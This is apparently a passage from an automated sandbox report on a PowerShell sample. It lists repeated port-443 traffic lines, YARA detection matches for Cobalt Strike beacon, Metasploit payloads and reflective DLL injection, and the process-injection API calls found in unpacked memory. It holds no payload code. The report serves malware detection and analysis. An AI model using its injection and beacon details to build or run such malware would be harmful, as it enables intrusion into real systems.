Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50171
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922

System Summary

Malicious sample detected (through community Yara rule)

Source: oEFrY6Xcyl.ps1, type: SAMPLE	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: amsi64_2820.amsi.csv, type: OTHER	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CA74 NtDuplicateObject,NtDuplicateObject,DuplicateHandle,	0_2_000001A6ED34CA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34C8F4 NtCreateThreadEx,GetCurrentProcess,NtCreateThreadEx,NtCreateThreadEx,CreateThread,CreateRemoteThread,	0_2_000001A6ED34C8F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D134 NtUnmapViewOfSection,GetCurrentProcess,NtUnmapViewOfSection,GetCurrentProcess,UnmapViewOfFile,	0_2_000001A6ED34D134
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D1C8 NtAllocateVirtualMemory,GetCurrentProcess,NtAllocateVirtualMemory,NtAllocateVirtualMemory,VirtualAlloc,VirtualAllocEx,	0_2_000001A6ED34D1C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CC00 NtMapViewOfSection,GetCurrentProcess,NtMapViewOfSection,GetCurrentProcess,MapViewOfFile,	0_2_000001A6ED34CC00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D4D8 NtQueryVirtualMemory,GetCurrentProcess,NtQueryVirtualMemory,GetCurrentProcess,VirtualQuery,	0_2_000001A6ED34D4D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D2EC GetCurrentProcess,NtFreeVirtualMemory,VirtualFree,	0_2_000001A6ED34D2EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CB7C NtGetContextThread,NtGetContextThread,GetThreadContext,	0_2_000001A6ED34CB7C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D3B8 NtProtectVirtualMemory,GetCurrentProcess,NtProtectVirtualMemory,NtProtectVirtualMemory,VirtualProtect,VirtualProtectEx,	0_2_000001A6ED34D3B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CE74 NtOpenThread,NtOpenThread,OpenThread,	0_2_000001A6ED34CE74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CD6C NtOpenProcess,NtOpenProcess,SetLastError,OpenProcess,	0_2_000001A6ED34CD6C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D5C4 NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,	0_2_000001A6ED34D5C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D030 NtResumeThread,NtResumeThread,ResumeThread,ResumeThread,	0_2_000001A6ED34D030
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34D0B0 NtSetContextThread,NtSetContextThread,SetThreadContext,	0_2_000001A6ED34D0B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34CF60 NtReadVirtualMemory,NtReadVirtualMemory,ReadProcessMemory,	0_2_000001A6ED34CF60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34C754 NtClose,NtClose,CloseHandle,SetLastError,	0_2_000001A6ED34C754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34C7E4 NtCreateSection,NtCreateSection,CreateFileMappingA,	0_2_000001A6ED34C7E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED341268 CreateProcessWithLogonW,GetLastError,

0_2_000001A6ED341268

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED301264	0_2_000001A6ED301264
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED30AAB0	0_2_000001A6ED30AAB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED305914	0_2_000001A6ED305914
